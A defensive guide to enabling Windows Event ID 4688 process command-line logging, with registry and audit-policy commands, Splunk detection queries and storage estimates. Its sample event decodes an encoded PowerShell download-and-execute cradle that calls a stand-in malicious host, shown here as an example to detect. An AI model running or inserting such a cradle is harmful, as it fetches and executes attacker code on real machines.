Windows Security Event ID 4688 logs process creation. Without command line logging enabled, it records that a process ran but not what arguments it was called with. The difference in investigation value between those two states is enormous.
Enabling command line logging
Two separate settings both need to be configured. First, enable Audit Process Creation via Group Policy:
Computer Configuration > Windows Settings > Security Settings >
Advanced Audit Policy Configuration > Detailed Tracking >
Audit Process Creation: SuccessSecond, enable command line capture via registry:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /fBoth are required. With only the audit policy and not the registry key, 4688 events are generated but the ProcessCommandLine field is empty. Verify both are active:
auditpol /get /subcategory:"Process Creation"
# Process Creation Success
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled
# ProcessCreationIncludeCmdLine_Enabled REG_DWORD 0x1What the event looks like with command line enabled
Log Name: Security
Event ID: 4688
New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line:
powershell.exe -NonInteractive -NoProfile -EncodedCommand
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA...Decoding that base64:
echo "SQBFAFgA..." | base64 -d | iconv -f utf-16le -t utf-8
# IEX (New-Object Net.WebClient).DownloadString('https://malicious.example/payload')Splunk detection queries
Suspicious encoded PowerShell:
index=wineventlog EventCode=4688
(Process_Command_Line="*-EncodedCommand*" OR Process_Command_Line="*-enc *")
| rex field=Process_Command_Line "(?i)-e(?:nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{20,})"
| eval decoded=base64decode(b64)
| table _time, host, Account_Name, Process_Command_Line, decodedWMI spawning child processes:
index=wineventlog EventCode=4688
Creator_Process_Name IN ("*\\WmiPrvSE.exe", "*\\wmiprvse.exe")
NOT New_Process_Name IN ("*\\WmiPrvSE.exe", "*\\conhost.exe")
| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_LineStorage volume
On an average enterprise workstation generating around 200 process creation events per hour, Event ID 4688 with command line logging adds roughly 15-25MB of raw event data per day per endpoint. At 1,000 endpoints budget approximately 5-8GB per day after SIEM compression and indexing. The storage cost is much lower than the investigation cost of not having this data when you need it.